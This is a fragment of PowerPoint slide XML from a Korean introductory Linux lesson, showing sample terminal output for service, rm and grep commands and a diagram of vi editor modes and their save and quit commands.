                <a:t>mysqld</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>를 정지 중</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>:                                         [  OK  ]</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>mysqld</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>을</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>를 시작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reload</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status</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>mysqld</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>pid</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> 6843)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>를 실행 중</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–status-all</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370272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grep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문자열 검색 명령어</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277600"/>
            <a:chOff x="1196835" y="1885839"/>
            <a:chExt cx="3919993" cy="4416616"/>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41661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rm *</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>rm: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>일반 빈 파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>`findme1'? y</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>rm: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>일반 빈 파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>`findme2'? y</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>rm: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>일반 파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>`first'? y</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grepnotme1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grepnotme2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grepme</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> -c</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>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-v </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>grepme</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E75B6"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>12</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15:11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grepnotme1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grepnotme2</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i</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>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15:11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-n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4:-</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5:-</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t>6:-</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15:11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grep "root" /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>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operator:x:11:0:operator:/root:/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echo "word1 word2 word3"&gt;grepword1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echo "word1 word4" &gt; grepword2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word</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>word1 word2 word3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>word1 word4</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 word</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 word3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>word1 word2 word3</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223917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vi : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>리눅스 기본 편집기</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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> test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vitest</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a: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vi </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>vitest</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E75B6"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pP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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>] &lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>명령</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>모드</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>&gt; -&gt; &lt;ex </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>모드</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>:q  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>편집기 종료</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>:q!  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>변경된 내용이 있더라도</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>저장하지 않고 무조건 종료</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>wq</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>변경된 내용을 저장하고 종료</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pP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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>i</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>, a, o </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>] &lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>명령</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>모드</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>&gt; -&gt; &lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>편집</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>모드</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>문자열 입력</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>수정 가능</a:t>
              </a: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esc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>]  &lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>편집</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>모드</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>&gt; -&gt; &lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>명령</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>모드</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pP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타원 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD6B2FEA-F440-48EB-B6C2-7CC2CAFC62DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6342696" y="2830061"/>
            <a:ext cx="1308016" cy="57528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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>시작</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="타원 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D15028F8-64C1-4D67-B5B6-8315E4B7EE63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6342696" y="4231089"/>
            <a:ext cx="1308016" cy="57528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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>종료</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="그룹 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC24574C-B760-4467-BF8C-E09108EA280F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8318543" y="2444644"/>
            <a:ext cx="1386741" cy="1090897"/>
            <a:chOff x="8580825" y="1522106"/>
            <a:chExt cx="1386741" cy="1090897"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="사각형: 둥근 모서리 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{206A5064-DCCB-4472-8BB3-39AD09F9A59B}"/>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모드 변경</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0"/>
                <a:t>,</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1600" b="1" dirty="0"/>
                <a:t>복사</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1600" b="1" dirty="0"/>
                <a:t>이동</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="TextBox 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A4FBF0F-9DBE-49B6-AD9C-8F0A981EDAD6}"/>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명령 모드 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
                <a:t>&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="그룹 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BEE5521-FD21-4827-AE9B-567B045509CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8318543" y="3878624"/>
            <a:ext cx="1386741" cy="1090897"/>
            <a:chOff x="8580825" y="1522106"/>
            <a:chExt cx="1386741" cy="1090897"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="사각형: 둥근 모서리 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4866CF1F-A69B-4E44-8242-6CB039B89BC8}"/>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치환</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0"/>
                <a:t>, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1600" b="1" dirty="0"/>
                <a:t>저장 및 종료</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="TextBox 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05FBD8BE-C049-450F-9E9F-774BAE22D5A6}"/>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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
                <a:t>ex </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
                <a:t>모드 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
                <a:t>&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="그룹 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C17F36D-1AE7-4897-9DF4-8C21C1B4A8EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10373115" y="2444644"/>
            <a:ext cx="1386741" cy="1090897"/>
            <a:chOff x="8580825" y="1522106"/>
            <a:chExt cx="1386741" cy="1090897"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="사각형: 둥근 모서리 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD53C7AD-ADD8-4B56-9F32-66B82A99ADFA}"/>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문서작성</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0"/>
                <a:t>,</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1600" b="1" dirty="0"/>
                <a:t>편집</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="TextBox 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2B95D2A-2859-4279-BB9A-01B312CDF7DA}"/>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편집 모드 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
                <a:t>&gt;</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="화살표: 오른쪽 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7394DB85-90E3-4387-8150-857A171FFECB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7832381" y="3005674"/>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화살표: 오른쪽 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{847AB51D-6EDD-497F-BA0D-9C517477047C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7854432" y="4453254"/>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화살표: 오른쪽 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99C8D319-809D-47E1-96AC-C5D8A88AF528}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9898118" y="2830061"/>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화살표: 오른쪽 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{614DAF29-4A61-4A7F-B5AB-4114F9BDC074}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9898118" y="3181288"/>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C0977CA9-94D2-43AA-B42D-F0F1E85FF619}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9675005" y="2512804"/>
            <a:ext cx="667830"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err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, a, o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="TextBox 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96683103-3B2A-45F0-9D2F-7BD9529D4F24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9790462" y="3409403"/>
            <a:ext cx="567514" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ESC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
